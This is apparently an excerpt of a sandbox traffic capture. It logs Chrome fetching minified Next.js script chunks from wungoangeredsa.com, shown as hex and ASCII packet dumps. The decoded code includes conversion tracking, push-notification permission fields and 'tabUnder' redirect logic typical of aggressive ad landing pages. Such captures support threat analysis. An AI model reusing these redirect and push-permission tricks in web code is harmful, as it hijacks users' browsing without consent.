                                                                                                          Data Ascii: questPermissionOnUserAction,C=n.doPushDomains,P=C?(0,a.Z)((0,r.Z)({},l),(0,o.Z)({},u.y.DO,C)):l,D=null!==(i=(0,s.r)())&&void 0!==i?i:P[(0,c.c)(landData).project],S=null!==p&&void 0!==p?p:(0,d.k)(D),T=(0,f.S)({oaid:e,osVersion:t,subId:m,passParamToParams:b


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.450069104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-98da"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1053
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a6c77f5f8-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 37 30 31 2c 37 37 31 38 35 2c 36 32 38 31 31 2c 39 30 38 34 34 2c 39 31 37 30 37 2c 39 36 31 31 2c 31 38 32 2c 31 31 30 38 35 2c 36 39 31 34 33 2c 39 36 39 34 34 2c 37 32 35 33 30 2c 36 36 35 35 33 2c 34 35 37 30 37 2c 32 34 36 34 2c 31 32 38 35 2c 32 38 37 39 36 5d 2c 7b 37 37 31 38 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 63 6f 63 61 2d 63 6f 6c 61 2d 70 61 63 6b 2d 32 2e 34 31 36 62
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[13701,77185,62811,90844,91707,9611,182,11085,69143,96944,72530,66553,45707,2464,1285,28796],{77185:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/coca-cola-pack-2.416b
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 64 6f 6c 6c 61 72 73 2d 62 6f 79 2e 33 33 65 30 36 61 32 61 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 31 35 35 2c 77 69 64 74 68 3a 32 30 37 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6d 41 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 51 41 41 41 44 77 41 51 43 64 41 53 6f 49 41 41 59 41 41 6b 41 34 4a 59 77 43 64 41 44 30 57 43 37 68 39 51 41 41 2f 75 62 39 67 55 4c 4e 77 62 48 32 37 48 58 6e 37 4c 57 66 31 32 77 54 73 46 70 72 6a 52 48 77 59 37 4e 44 78 76 4c 44 4d 71 2b 2b
                                                                                                          Data Ascii: ion(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/dollars-boy.33e06a2a.webp",height:155,width:207,blurDataURL:"data:image/webp;base64,UklGRmAAAABXRUJQVlA4IFQAAADwAQCdASoIAAYAAkA4JYwCdAD0WC7h9QAA/ub9gULNwbH27HXn7LWf12wTsFprjRHwY7NDxvLDMq++
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 41 34 49 44 77 41 41 41 44 51 41 51 43 64 41 53 6f 49 41 41 51 41 41 6b 41 34 4a 5a 51 43 64 41 44 30 6a 4a 36 6f 51 41 44 2b 71 30 54 38 61 2f 4b 53 6e 78 32 63 2f 4f 50 31 39 76 79 79 45 53 62 41 62 32 48 41 6a 45 53 35 51 7a 6a 36 56 6b 5a 43 6a 57 4f 41 41 41 41 3d 22 2c 62 6c 75 72 57 69 64 74 68 3a 38 2c 62 6c 75 72 48 65 69 67 68 74 3a 34 7d 7d 2c 36 39 31 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 67 69 72 6c 2d 67 6c 61 73 73 65 73 2e 35 36 31 62 35 64 63 63 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 38 30 2c 77 69 64 74 68 3a 31 39 30 2c 62 6c 75 72 44 61 74 61 55 52
                                                                                                          Data Ascii: A4IDwAAADQAQCdASoIAAQAAkA4JZQCdAD0jJ6oQAD+q0T8a/KSnx2c/OP19vyyESbAb2HAjES5Qzj6VkZCjWOAAAA=",blurWidth:8,blurHeight:4}},69143:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/girl-glasses.561b5dcc.webp",height:80,width:190,blurDataUR
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 69 64 74 68 3a 32 30 30 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6f 41 41 41 41 42 58 52 55 4a 51 56 6c 41 34 57 41 6f 41 41 41 41 51 41 41 41 41 42 51 41 41 42 77 41 41 51 55 78 51 53 42 4d 41 41 41 41 42 44 2f 44 2b 2f 34 69 49 49 42 42 49 4d 74 76 66 61 34 69 49 2f 6f 63 48 41 46 5a 51 4f 43 42 47 41 41 41 41 38 41 45 41 6e 51 45 71 42 67 41 49 41 41 4a 41 4f 43 57 49 41 6e 51 42 46 4b 43 55 53 30 57 41 41 50 37 43 6e 71 76 65 52 54 56 48 6f 46 61 4d 36 44 4a 4a 4d 2b 68 77 4a 6e 6e 72 2b 36 75 47 31 6a 4b 38 70 78 35 6c 6d 75 31 30 38 48 47 77 67 63 43 57 59 72 7a 66 6b 65 41 41 41 41 3d 3d 22 2c 62 6c 75 72 57 69 64 74 68 3a 36 2c 62 6c 75 72 48 65 69 67 68 74 3a 38
                                                                                                          Data Ascii: idth:200,blurDataURL:"data:image/webp;base64,UklGRoAAAABXRUJQVlA4WAoAAAAQAAAABQAABwAAQUxQSBMAAAABD/D+/4iIIBBIMtvfa4iI/ocHAFZQOCBGAAAA8AEAnQEqBgAIAAJAOCWIAnQBFKCUS0WAAP7CnqveRTVHoFaM6DJJM+hwJnnr+6uG1jK8px5lmu108HGwgcCWYrzfkeAAAA==",blurWidth:6,blurHeight:8
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 65 67 61 70 68 6f 6e 65 2e 61 62 37 38 34 61 63 64 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 34 38 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6e 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 57 41 6f 41 41 41 41 51 41 41 41 41 42 77 41 41 42 51 41 41 51 55 78 51 53 44 45 41 41 41 41 41 41 41 41 41 41 41 41 70 63 51 41 41 4d 30 46 46 65 75 37 4b 41 43 6a 39 2f 2f 2f 2f 2f 38 6f 41 4a 2f 33 2f 2f 2f 2f 2f 79 67 41 41 4a 73 2b 4b 63 4f 76 4b 41 41 41 41 57 6c 77 41 4b 47 77 41 41 46 5a 51 4f 43 41 65 41 41
                                                                                                          Data Ascii: rict";t.r(n),n.default={src:"/_next/static/media/megaphone.ab784acd.webp",height:38,width:48,blurDataURL:"data:image/webp;base64,UklGRnYAAABXRUJQVlA4WAoAAAAQAAAABwAABQAAQUxQSDEAAAAAAAAAAAApcQAAM0FFeu7KACj9/////8oAJ/3/////ygAAJs+KcOvKAAAAWlwAKGwAAFZQOCAeAA
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 46 41 4d 49 4c 59 2c 7b 73 72 63 3a 6c 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 6c 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6c 2e 64 65 66 61 75 6c 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 46 41 4d 49 4c 59 5f 53 48 4f 50 2c 7b 73 72 63 3a 64 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 64 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 64 2e 64 65 66 61 75 6c 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 43 4f 43 41 5f 43 4f 4c 41 5f 32 2c 7b 73 72 63 3a 73 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 73 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65
                                                                                                          Data Ascii: t.height}),(0,i.Z)(r,o.FAMILY,{src:l.default.src,width:l.default.width,height:l.default.height}),(0,i.Z)(r,o.FAMILY_SHOP,{src:d.default.src,width:d.default.width,height:d.default.height}),(0,i.Z)(r,o.COCA_COLA_2,{src:s.default.src,width:s.default.width,he
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 6e 22 5d 29 3b 72 65 74 75 72 6e 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 22 2c 22 3b 5c 6e 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 66 6c 65 78 3a 20 31 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29
                                                                                                          Data Ascii: n"]);return A=function(){return e},e}function w(){var e=(0,d.Z)(["\n background: ",";\n padding: ",";\n border-radius: ",";\n"]);return w=function(){return e},e}function v(){var e=(0,d.Z)(["\n flex: 1;\n"]);return v=function(){return e},e}function b()
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 2c 22 3b 5c 6e 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 22 2c 22 3b 5c 6e 20 20 67 61 70 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 63 6f 6c 6f 72 3a 20 23 38 38 38 3b 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 5c 6e 20 20 74 65 78 74 2d 64 65 63 6f
                                                                                                          Data Ascii: ,";\n justify-content: ",";\n gap: ",";\n"]);return y=function(){return e},e}function Z(){var e=(0,d.Z)(["\n width: ",";\n margin: ",";\n"]);return Z=function(){return e},e}function C(){var e=(0,d.Z)(["\n color: #888;\n font-size: 12px;\n text-deco
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 64 20 30 3a 6e 2e 70 61 64 64 69 6e 67 29 7c 7c 22 31 30 70 78 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 67 61 70 29 7c 7c 22 30 2e 36 72 65 6d 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 70 61 64 64 69 6e 67 4d 65 64 69 61 37 36 38 7d 29 29 2c 49 3d 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62
                                                                                                          Data Ascii: d 0:n.padding)||"10px"}),(function(e){var n;return(null===(n=e.theme.comments)||void 0===n?void 0:n.gap)||"0.6rem"}),(function(e){var n;return null===(n=e.theme.comments)||void 0===n?void 0:n.paddingMedia768})),I=l.ZP.div.withConfig({componentId:"sc-e562b
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62 32 36 65 2d 33 22 7d 29 28 76 28 29 29 2c 55 3d 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62 32 36 65 2d 34 22 7d 29 28 62 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e 2e 61 75 74 68 6f 72 4e 61 6d 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6f 6c 6f 72 29 7c 7c 22 23 30 30 30 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                          Data Ascii: l.ZP.div.withConfig({componentId:"sc-e562b26e-3"})(v()),U=l.ZP.div.withConfig({componentId:"sc-e562b26e-4"})(b(),(function(e){var n,t;return(null===(n=e.theme.comments)||void 0===n||null===(t=n.authorName)||void 0===t?void 0:t.color)||"#000"}),(function(e


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.450067104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1ba5"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1625
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a794d7ca0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC873INData Raw: 31 62 61 35 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 39 35 30 5d 2c 7b 32 37 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 74 28 37 30 38 36 35 29 2c 69 3d 74 28 39 36 36 37 30 29 2c 6f 3d 74 28 32 34 31 35 36 29 2c 61 3d 74 28 31 37 39 36 39 29 2c 73 3d 74 28 37 31 39 36 31 29 2c 63 3d 74 28 33 31 34 35 36 29 2c 75 3d 74 28 38 37 37 32 32 29 2c 6c 3d 74 28 39 37 38 39 37 29 2c 64 3d 74 28 35 33 34 34 34 29 2c 76 3d 74 28 32 39 37 35 34 29 2c 66 3d 74 28
                                                                                                          Data Ascii: 1ba5"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[96950],{2798:function(e,n,t){t.d(n,{d:function(){return b}});var r=t(70865),i=t(96670),o=t(24156),a=t(17969),s=t(71961),c=t(31456),u=t(87722),l=t(97897),d=t(53444),v=t(29754),f=t(
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 20 64 6f 65 73 20 6e 6f 74 20 67 65 74 20 74 72 69 67 67 65 72 65 64 20 69 6e 20 74 68 65 20 64 65 76 20 6d 6f 64 65 22 29 2c 5f 26 26 49 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 44 45 56 45 4c 4f 50 4d 45 4e 54 5f 4d 4f 44 45 7d 29 2c 21 30 29 3a 6e 3f 55 7c 7c 64 2e 6e 2e 73 3f 4f 3f 67 3f 79 3f 28 28 30 2c 73 2e 63 4d 29 28 22 55 73 65 72 20 68 61 73 20 6d 61 64 65 20 63 6f 6e 76 20 6f 6e 20 74 68 65 20 6f 74 68 65 72 20 64 6f 6d 61 69 6e 2e 20 49 73 4e 6f 6e 55 6e 69 71 75 65 43 72 6f 73 73 20 3d 22 2c 79 29 2c 5f 26 26 49 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 4e 4f 4e 5f 55 4e 49 51 55 45 5f 43 52 4f 53 53 5f 44 4f 4d 41 49 4e 7d 29 2c 21
                                                                                                          Data Ascii: does not get triggered in the dev mode"),_&&I({event:l._.CONVERSION_DISABLED_DEVELOPMENT_MODE}),!0):n?U||d.n.s?O?g?y?((0,s.cM)("User has made conv on the other domain. IsNonUniqueCross =",y),_&&I({event:l._.CONVERSION_DISABLED_NON_UNIQUE_CROSS_DOMAIN}),!
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 75 64 69 65 6e 63 65 49 64 29 26 26 21 21 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 70 61 72 74 6e 65 72 29 26 26 74 2e 69 73 45 6e 61 62 6c 65 64 2c 45 3d 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 7d 3b 66 26 26 28 45 3d 28 30 2c 69 2e 5a 29 28 28 30 2c 72 2e 5a 29 28 7b 7d 2c 45 29 2c 7b 61 75 64 69 74 6f 72 79 3a 74 2e 61 75 64 69 65 6e 63 65 49 64 7d 29 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 30 2c 75 2e 63 29 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 2c 73 75 62 49 64 3a 6e 75 6c 6c 21 3d 3d 55 26 26 76 6f 69 64 20 30 21 3d 3d 55 3f 55 3a 64 2e 6e 2e 73 7d 29 2c 28
                                                                                                          Data Ascii: void 0===t?void 0:t.audienceId)&&!!(null===t||void 0===t?void 0:t.partner)&&t.isEnabled,E={event:l._.CONVERSION};f&&(E=(0,i.Z)((0,r.Z)({},E),{auditory:t.audienceId}));var N=function(e,n){(0,u.c)({event:l._.CONVERSION,subId:null!==U&&void 0!==U?U:d.n.s}),(
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 29 29 2c 63 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 61 70 70 65 6e 64 28 65 2c 63 5b 65 5d 29 7d 29 29 3b 76 61 72 20 66 3d 73 2e 6e 2e 70 72 65 76 69 65 77 3f 76 6f 69 64 20 30 3a 6c 28 7b 7a 6f 6e 65 54 79 70 65 3a 6f 2e 77 2e 74 61 62 55 6e 64 65 72 2c 7a 6f 6e 65 44 65 74 61 69 6c 73 3a 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2c 74 61 62 3a 22 63 75 72 72 65 6e 74 22 7d 29 3b 28 30 2c 72 2e 50 4e 29 28 22 52 45 44 49 52 45 43 54 20 3d 3e 20 74 61 62 20 63 75 72 72 65 6e 74 3a 20 22 2e 63 6f 6e 63 61 74 28 66 2c 22 2c 20 6e 65 77 20 74 61 62 3a 20 22
                                                                                                          Data Ascii: )),c&&Object.keys(c).forEach((function(e){d.searchParams.append(e,c[e])}));var f=s.n.preview?void 0:l({zoneType:o.w.tabUnder,zoneDetails:null===n||void 0===n?void 0:n.zonesDetails,tab:"current"});(0,r.PN)("REDIRECT => tab current: ".concat(f,", new tab: "
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 34 36 38 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76 61 72 20 72 3d 74 28 34 32 38 33 38 29 2c 69 3d 74 28 31 32 31 33 39 29 2c 6f 3d 74 28 32 39 37 35 34 29 2c 61 3d 74 28 35 30 39 33 30 29 2c 73 3d 69 2e 75 73 65 4c 61 79 6f 75 74 45 66 66 65 63 74 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 6e 2c 74 3d 28 30 2c 69 2e 75 73 65 52 65 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 6e 20 65 76 65 6e 74 20 68 61 6e 64 6c 65 72 20 77 68 69 6c 65 20 72 65 6e 64 65 72 69
                                                                                                          Data Ascii: o, Helvetica, sans-serif"},46889:function(e,n,t){t.d(n,{u:function(){return l}});var r=t(42838),i=t(12139),o=t(29754),a=t(50930),s=i.useLayoutEffect;function c(e){var n,t=(0,i.useRef)((function(){throw new Error("Cannot call an event handler while renderi
                                                                                                          2025-01-06 11:09:20 UTC736INData Raw: 65 2c 74 29 3b 72 65 74 75 72 6e 20 61 3f 76 28 61 29 3a 69 7d 63 61 74 63 68 28 73 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 22 2e 63 6f 6e 63 61 74 28 74 2c 22 53 74 6f 72 61 67 65 20 6b 65 79 20 5c 75 32 30 31 63 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 5c 75 32 30 31 64 3a 22 29 2c 73 29 2c 69 7d 7d 29 2c 5b 6e 2c 65 2c 76 2c 74 5d 29 2c 45 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 3f 66 28 29 3a 28 30 2c 72 2e 5a 29 28 6e 2c 46 75 6e 63 74 69 6f 6e 29 3f 6e 28 29 3a 6e 7d 29 29 2c 62 3d 45 5b 30 5d 2c 5f 3d 45 5b 31 5d 2c 4e 3d 63 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 72 79 7b 76 61 72 20 69 3d 28 30 2c 72 2e 5a
                                                                                                          Data Ascii: e,t);return a?v(a):i}catch(s){return console.warn("Error reading ".concat(t,"Storage key \u201c").concat(e,"\u201d:"),s),i}}),[n,e,v,t]),E=(0,i.useState)((function(){return l?f():(0,r.Z)(n,Function)?n():n})),b=E[0],_=E[1],N=c((function(n){try{var i=(0,r.Z
                                                                                                          2025-01-06 11:09:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.450066104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
